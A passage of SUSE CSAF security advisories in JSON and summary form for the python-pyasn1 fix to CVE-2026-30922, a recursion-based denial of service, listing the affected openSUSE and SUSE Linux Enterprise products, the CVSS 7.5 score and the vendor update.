"full_product_name": {
"name": "python311-pyasn1-0.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.x86_64"
},
"product_reference": "python311-pyasn1-0.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-pyasn1-0.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.aarch64"
},
"product_reference": "python313-pyasn1-0.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-pyasn1-0.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.ppc64le"
},
"product_reference": "python313-pyasn1-0.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-pyasn1-0.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.s390x"
},
"product_reference": "python313-pyasn1-0.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-pyasn1-0.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.x86_64"
},
"product_reference": "python313-pyasn1-0.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-30922",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-30922"
}
],
"notes": [
{
"category": "general",
"text": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \"Indefinite Length\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.aarch64",
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.s390x",
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.x86_64",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.aarch64",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.s390x",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-30922",
"url": "https://www.suse.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "SUSE Bug 1259803 for CVE-2026-30922",
"url": "https://bugzilla.suse.com/1259803"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.aarch64",
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.s390x",
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.x86_64",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.aarch64",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.s390x",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.aarch64",
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.s390x",
"openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.x86_64",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.aarch64",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.s390x",
"openSUSE Tumbleweed:python313-pyasn1-0.6.3-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-19T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-30922"
}
]
}
SUSE-SU-2026:20821-1
Vulnerability from csaf_suse - Published: 2026-03-24 09:09 - Updated: 2026-03-24 09:09Summary
Security update for python-pyasn1
Severity
Important
Notes
Title of the patch: Security update for python-pyasn1
Description of the patch: This update for python-pyasn1 fixes the following issue:
- CVE-2026-30922: Denial of Service via Unbounded Recursion (bsc#1259803).
Patchnames: SUSE-SLE-Micro-6.0-637
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for python-pyasn1",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for python-pyasn1 fixes the following issue:\n\n- CVE-2026-30922: Denial of Service via Unbounded Recursion (bsc#1259803).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SLE-Micro-6.0-637",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_20821-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:20821-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620821-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:20821-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024900.html"
},
{
"category": "self",
"summary": "SUSE Bug 1259803",
"url": "https://bugzilla.suse.com/1259803"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-30922 page",
"url": "https://www.suse.com/security/cve/CVE-2026-30922/"
}
],
"title": "Security update for python-pyasn1",
"tracking": {
"current_release_date": "2026-03-24T09:09:54Z",
"generator": {
"date": "2026-03-24T09:09:54Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:20821-1",
"initial_release_date": "2026-03-24T09:09:54Z",
"revision_history": [
{
"date": "2026-03-24T09:09:54Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python311-pyasn1-0.5.0-4.1.noarch",
"product": {
"name": "python311-pyasn1-0.5.0-4.1.noarch",
"product_id": "python311-pyasn1-0.5.0-4.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Micro 6.0",
"product": {
"name": "SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sl-micro:6.0"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-4.1.noarch as component of SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0:python311-pyasn1-0.5.0-4.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-4.1.noarch",
"relates_to_product_reference": "SUSE Linux Micro 6.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-30922",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-30922"
}
],
"notes": [
{
"category": "general",
"text": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \"Indefinite Length\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:python311-pyasn1-0.5.0-4.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-30922",
"url": "https://www.suse.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "SUSE Bug 1259803 for CVE-2026-30922",
"url": "https://bugzilla.suse.com/1259803"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:python311-pyasn1-0.5.0-4.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:python311-pyasn1-0.5.0-4.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T09:09:54Z",
"details": "important"
}
],
"title": "CVE-2026-30922"
}
]
}
SUSE-SU-2026:1158-1
Vulnerability from csaf_suse - Published: 2026-03-31 11:55 - Updated: 2026-03-31 11:55Summary
Security update for python-pyasn1
Severity
Important
Notes
Title of the patch: Security update for python-pyasn1
Description of the patch: This update for python-pyasn1 fixes the following issues:
- CVE-2026-30922: Denial of Service via Unbounded Recursion (bsc#1259803).
Patchnames: SUSE-2026-1158,SUSE-SLE-Micro-5.3-2026-1158,SUSE-SLE-Micro-5.4-2026-1158,SUSE-SLE-Micro-5.5-2026-1158,SUSE-SLE-Module-Basesystem-15-SP7-2026-1158,SUSE-SLE-Product-HPC-15-SP4-ESPOS-2026-1158,SUSE-SLE-Product-HPC-15-SP4-LTSS-2026-1158,SUSE-SLE-Product-HPC-15-SP5-ESPOS-2026-1158,SUSE-SLE-Product-HPC-15-SP5-LTSS-2026-1158,SUSE-SLE-Product-SLES-15-SP4-LTSS-2026-1158,SUSE-SLE-Product-SLES-15-SP5-LTSS-2026-1158,SUSE-SLE-Product-SLES-15-SP6-LTSS-2026-1158,SUSE-SLE-Product-SLES_SAP-15-SP4-2026-1158,SUSE-SLE-Product-SLES_SAP-15-SP5-2026-1158,SUSE-SLE-Product-SLES_SAP-15-SP6-2026-1158,SUSE-SUSE-MicroOS-5.2-2026-1158
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
| URL | Category | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for python-pyasn1",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for python-pyasn1 fixes the following issues:\n\n- CVE-2026-30922: Denial of Service via Unbounded Recursion (bsc#1259803).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1158,SUSE-SLE-Micro-5.3-2026-1158,SUSE-SLE-Micro-5.4-2026-1158,SUSE-SLE-Micro-5.5-2026-1158,SUSE-SLE-Module-Basesystem-15-SP7-2026-1158,SUSE-SLE-Product-HPC-15-SP4-ESPOS-2026-1158,SUSE-SLE-Product-HPC-15-SP4-LTSS-2026-1158,SUSE-SLE-Product-HPC-15-SP5-ESPOS-2026-1158,SUSE-SLE-Product-HPC-15-SP5-LTSS-2026-1158,SUSE-SLE-Product-SLES-15-SP4-LTSS-2026-1158,SUSE-SLE-Product-SLES-15-SP5-LTSS-2026-1158,SUSE-SLE-Product-SLES-15-SP6-LTSS-2026-1158,SUSE-SLE-Product-SLES_SAP-15-SP4-2026-1158,SUSE-SLE-Product-SLES_SAP-15-SP5-2026-1158,SUSE-SLE-Product-SLES_SAP-15-SP6-2026-1158,SUSE-SUSE-MicroOS-5.2-2026-1158",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1158-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1158-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261158-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1158-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2026-March/045194.html"
},
{
"category": "self",
"summary": "SUSE Bug 1259803",
"url": "https://bugzilla.suse.com/1259803"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-30922 page",
"url": "https://www.suse.com/security/cve/CVE-2026-30922/"
}
],
"title": "Security update for python-pyasn1",
"tracking": {
"current_release_date": "2026-03-31T11:55:53Z",
"generator": {
"date": "2026-03-31T11:55:53Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1158-1",
"initial_release_date": "2026-03-31T11:55:53Z",
"revision_history": [
{
"date": "2026-03-31T11:55:53Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python2-pyasn1-0.4.2-150000.3.16.1.noarch",
"product": {
"name": "python2-pyasn1-0.4.2-150000.3.16.1.noarch",
"product_id": "python2-pyasn1-0.4.2-150000.3.16.1.noarch"
}
},
{
"category": "product_version",
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"product": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"product_id": "python3-pyasn1-0.4.2-150000.3.16.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Micro 5.3",
"product": {
"name": "SUSE Linux Enterprise Micro 5.3",
"product_id": "SUSE Linux Enterprise Micro 5.3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-micro:5.3"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Micro 5.4",
"product": {
"name": "SUSE Linux Enterprise Micro 5.4",
"product_id": "SUSE Linux Enterprise Micro 5.4",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-micro:5.4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Micro 5.5",
"product": {
"name": "SUSE Linux Enterprise Micro 5.5",
"product_id": "SUSE Linux Enterprise Micro 5.5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-micro:5.5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-basesystem:15:sp7"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-espos:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-espos:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP6-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP6-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP6-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Micro 5.2",
"product": {
"name": "SUSE Linux Enterprise Micro 5.2",
"product_id": "SUSE Linux Enterprise Micro 5.2",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse-microos:5.2"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Micro 5.3",
"product_id": "SUSE Linux Enterprise Micro 5.3:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Micro 5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Micro 5.4",
"product_id": "SUSE Linux Enterprise Micro 5.4:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Micro 5.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Micro 5.5",
"product_id": "SUSE Linux Enterprise Micro 5.5:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Micro 5.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Module for Basesystem 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Basesystem 15 SP7:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Basesystem 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Server 15 SP6-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP6-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP6-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP6:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.4.2-150000.3.16.1.noarch as component of SUSE Linux Enterprise Micro 5.2",
"product_id": "SUSE Linux Enterprise Micro 5.2:python3-pyasn1-0.4.2-150000.3.16.1.noarch"
},
"product_reference": "python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Micro 5.2"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-30922",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-30922"
}
],
"notes": [
{
"category": "general",
"text": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \"Indefinite Length\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.2:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
"SUSE Linux Enterprise Micro 5.3:python3-pyasn1-0.4.2-150000.3.16.1.noarch",
